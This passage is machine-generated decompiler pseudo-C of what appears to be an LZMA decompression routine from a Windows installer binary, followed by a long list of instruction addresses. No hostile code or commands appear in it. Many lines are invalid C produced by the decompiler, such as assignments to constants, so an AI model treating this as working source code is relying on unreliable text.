							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e3e
                                                                                                                                                                                                  0x00406e3e
                                                                                                                                                                                                  0x00406e42
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406efc
                                                                                                                                                                                                  0x00406f08
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407167
                                                                                                                                                                                                  0x0040716d
                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                  0x0040718d
                                                                                                                                                                                                  0x00407190
                                                                                                                                                                                                  0x00407196
                                                                                                                                                                                                  0x004071a1
                                                                                                                                                                                                  0x004071a3
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407184
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x004071ad
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071b3
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x004071bf
                                                                                                                                                                                                  0x004071c6
                                                                                                                                                                                                  0x004071ce
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x00406e48
                                                                                                                                                                                                  0x00406e4c
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00407390
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00406e52
                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                  0x00406e5b
                                                                                                                                                                                                  0x00406e5f
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x0040697f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406990
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406999
                                                                                                                                                                                                  0x0040699c
                                                                                                                                                                                                  0x0040699f
                                                                                                                                                                                                  0x004069a3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004069a9
